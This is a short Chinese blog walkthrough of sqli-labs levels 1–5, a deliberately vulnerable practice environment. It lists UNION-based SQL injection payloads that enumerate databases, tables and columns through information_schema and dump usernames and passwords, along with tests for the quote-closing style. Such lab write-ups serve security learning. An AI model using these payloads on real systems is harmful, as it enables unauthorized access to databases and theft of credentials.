sqli lab 1-4

less-1

  • 爆库
    id=1222’ union select 1,group_concat(schema_name),database() from information_schema.schemata
    –+#
    在这里插入图片描述
  • 爆表
    ?id=1222’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() – #
    在这里插入图片描述
  • 爆字段
    —缺,下面有less-2
  • 爆数据
    ?id=123’ union select 1,group_concat(username),group_concat(password) from users
    –+#
    在这里插入图片描述
    查数据库名–>查表名–>查字段名–>查数据

group_concat()函数的利用,使一个显示位可爆多组数据

less-2

  • and 1=2 无数据 判断为数字型注入
  • 爆数据库
    ?id=22222 union select 1,group_concat(schema_name),1 from information_schema.schemata
    在这里插入图片描述
  • 爆表
    ?id=22222 union select 1,group_concat(table_name),1 from information_schema.tables where table_schema=database()
    在这里插入图片描述
  • 爆字段
    ?id=22222 union select 1,group_concat(column_name),1 from information_schema.columns where table_name=‘uagents’
    在这里插入图片描述
  • 爆数据
    ?id=22222 union select 1,group_concat(uagent),group_concat(ip_address) from uagents
    在这里插入图片描述
    空的

less-3

  • 题目提示输入数据
  • and 1=2,1=1无反应 ?id=1 ‘报错
    在这里插入图片描述
    可看出来闭合为’)
    ?id=3 ') – #
    在这里插入图片描述
    爆库
    ?id=555 ') union select 1,2,group_concat(schema_name) from information_schema.schemata – #
    在这里插入图片描述

less-4

尝试:?id=1 ’ "
在这里插入图片描述
闭合 ")
?id=5555 ") union select database(),database(),user()-- #
在这里插入图片描述
爆此数据库表
?id=5555 ") union select 1,1,group_concat(table_name) from information_schema.tables where table_schema = database() – #
在这里插入图片描述

less-5

?id=2’
在这里插入图片描述
‘闭合
但?id=2’ – #
在这里插入图片描述

posted @ 2020-03-15 15:27  10nnn4R  阅读(129)  评论(0编辑  收藏  举报